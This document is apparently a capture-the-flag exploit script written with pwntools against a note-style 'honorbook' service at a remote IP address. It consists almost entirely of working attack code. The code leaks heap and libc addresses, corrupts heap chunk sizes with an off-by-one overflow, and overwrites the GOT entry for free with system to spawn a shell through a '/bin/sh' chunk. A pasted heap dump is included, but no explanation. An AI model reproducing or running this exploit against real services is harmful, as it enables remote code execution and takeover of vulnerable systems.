1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
|
from pwn import * import os context.log_level = 'debug' elf=ELF('./honorbook') libc=ELF('./libs/lib/libc-2.27.so') free_got=elf.got['free'] def gdb_attach(): os.system('xfce4-terminal -x sh -c "gdb-multiarch test_mips -ex \'target remote 127.0.0.1:1234\'"')
p=remote('121.36.192.114','9999') def add(id,name,msg): p.sendlineafter('Code','1') p.sendlineafter('ID',str(id)) p.sendafter('name',name) p.sendafter('Msg',msg) def free(id): p.sendlineafter('Code','2') p.sendlineafter('ID',str(id)) def show(id): a=[] p.sendlineafter('Code','3') p.sendlineafter('ID',str(id)) p.recvuntil('Username: ') name=p.recv(27) print(name) p.recvuntil('Msg: ') msg=p.recvuntil('\n',drop=True) print(msg) a=[name,msg] return a
def edit(id,msg): p.sendlineafter('Code','4') p.sendlineafter('Index',str(id)) p.sendafter('Msg',msg)
pause() add(0,'a'*0x18,'b'*0x10+'\n') add(1,'a'*0x18,'b'*0xb8+p64(0x31)+'\n') for i in range(6): add(i+2,'a'*0x18,'b'*0x10+'\n') leak1=show(0) heap_addr=u64(leak1[0][24:27].ljust(8,'\x00')) print(hex(heap_addr))
free(0) add(0,'a'*0x18,'c'*232+'\xf1')
for i in range(6): free(i+2) free(1)
''' 0x25f80: 0x6363636363636363 0x00000000000000f1 0x25f90: 0x0000004000aa79f8 0x0000004000aa79f8 0x25fa0: 0x6161616161616161 0x0000000000025fc0 0x25fb0: 0x0000000000000000 0x00000000000000f1 0x25fc0: 0x0000000000026680 0x6262626262626262
''' for i in range(6): add(i+2,str(i)*0x18,'b'*0x10+'\n') add(1,'/bin/sh\x00'*3,'/bin/sh\x00'*2+'\n')
add(8,'8'*0x18,'f'*0x10+'\n') edit(2,'2'*0x18+p64(free_got)) print(hex(free_got)) leak_2=show(8) libc_addr=u64(leak_2[1][0:3].ljust(8,'\x00'))-libc.sym['free'] system=libc_addr+libc.sym['system'] print(hex(libc_addr)) print(hex(system)) edit(8,p64(system)[0:3]) free(1)
p.interactive()
|